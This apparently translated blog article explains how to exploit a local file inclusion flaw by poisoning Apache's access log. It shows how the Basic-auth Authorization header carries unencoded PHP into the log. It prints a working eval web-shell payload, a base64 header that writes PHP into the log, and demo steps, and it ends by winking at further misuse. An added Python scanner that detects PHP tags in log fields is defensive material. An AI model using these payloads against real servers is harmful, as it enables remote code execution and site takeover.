Apache Log bypass URL encoding method

Source: Internet
Author: User
Tags: apache, log

Scenario: when a local file inclusion (LFI) vulnerability exists, the most common way to exploit it is to write controlled content into a log file and then include that file. Some problems arise in this process; the following describes those problems and their solutions.
Topic: Apache Log bypass URL encoding method
First, a brief introduction to Apache logs. By default, Apache logs are stored in the logs folder under the installation directory and consist mainly of an access log and an error log. On Windows these two files are access.log and error.log; on Linux they are access_log and error_log.
(Note: I have set up a test environment on a local virtual machine with the IP address 192.168.5.66.)
access.log/access_log records every request made to the web server. Its format is as follows:

192.168.5.66 - - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876


The fields are: 1. remote host, 2. blank (E-mail), 3. blank (login name), 4. request time, 5. method + resource + protocol, 6. status code, 7. bytes sent.
Because the requested resource is logged verbatim, a malicious access record can be constructed. The payload is as follows:


http://192.168.5.66/test.php?id=<?php eval($_POST[test]);?>


Entering the preceding address in the browser produces the following record in the access log:

192.168.5.66 - - [21/Apr/2014:11:21:04 +0800] "GET /test.php?id=%3C?php%20eval($_POST[test]);?%3E HTTP/1.1" 200 2956


In this log entry, the fragment

id=%3C?php%20eval($_POST[test]);?%3E

corresponds to the code

id=<?php eval($_POST[test]);?>


The characters '<', ' ' (space) and '>' have been URL encoded as '%3C', '%20' and '%3E', so the logged text is no longer valid PHP. To write correct PHP code into the log, the URL encoding must be bypassed.
How URL encoding is bypassed:
The Authorization field of the HTTP header carries the credentials for HTTP Basic authentication. Its value has the format "Basic base64(user:pass)", and Apache writes the decoded user name into the log without URL encoding it. Accordingly, the payload is reconstructed as follows:
URL: http://192.168.5.115/test.php
Add the header "Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=" to the HTTP request.
Note: PD9waHAgcGhwaW5mbygpPz46MTIzNTY= is base64("<?php phpinfo()?>:12356").
With this method the URL encoding is bypassed and the PHP code is written into the log intact, in the login-name field:

192.168.5.115 - <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] "GET /test.php HTTP/1.1" 200 2735
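From the defender's side, the point of the article is that the poisoned code can land in the request field (URL encoded) or in the login-name field (raw). The following added example, which is not part of the original article, parses Common Log Format lines, URL-decodes the request target and flags PHP open tags in the request, ident and authuser fields; the sample log lines are constructed after the ones shown above.

```python
import re
from urllib.parse import unquote

# Apache Common Log Format: host ident authuser [time] "request" status bytes.
# authuser may contain spaces (as the poisoned entry above shows), so it is
# matched non-greedily up to the " [" that opens the timestamp.
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<authuser>.*?) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# PHP open tags: "<?php", the short tag "<?" and the echo tag "<?=".
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so a double-encoded '<' (%253C) is also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines):
    """Return (line_number, field, value) for every field carrying a PHP tag.

    The request line is decoded before matching; ident and authuser are checked
    raw, because Apache already logs the decoded Basic-auth user name there.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = CLF_RE.match(line.rstrip('\n'))
        if not m:
            hits.append((n, 'unparsed', line))  # a malformed line is worth a look too
            continue
        for field in ('ident', 'authuser', 'request'):
            value = m.group(field)
            if field == 'request':
                value = fully_decode(value)
            if PHP_TAG_RE.search(value):
                hits.append((n, field, value))
    return hits


# Constructed sample log, modelled on the entries shown in this article.
SAMPLE_LOG = [
    '192.168.5.66 - - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876',
    '192.168.5.66 - - [21/Apr/2014:11:21:04 +0800] "GET /test.php?id=%3C?php%20eval($_POST[test]);?%3E HTTP/1.1" 200 2956',
    '192.168.5.115 - <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] "GET /test.php HTTP/1.1" 200 2735',
]

if __name__ == '__main__':
    for n, field, value in scan_log(SAMPLE_LOG):
        print(f'line {n}: PHP tag in {field}: {value}')
```

The first sample line is benign and produces no hit; the second is caught only after decoding, the third only because the authuser field is inspected raw.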



Demo:
1. Visit the website root directory.
2. View the access log.
3. Add the Authorization field to the HTTP header.
4. Check the access log to confirm that the Authorization field value has been written.

In this way, PHP code can be written into the Apache log by bypassing URL encoding. What is done with the code after it has been written is not described here. You know, hey.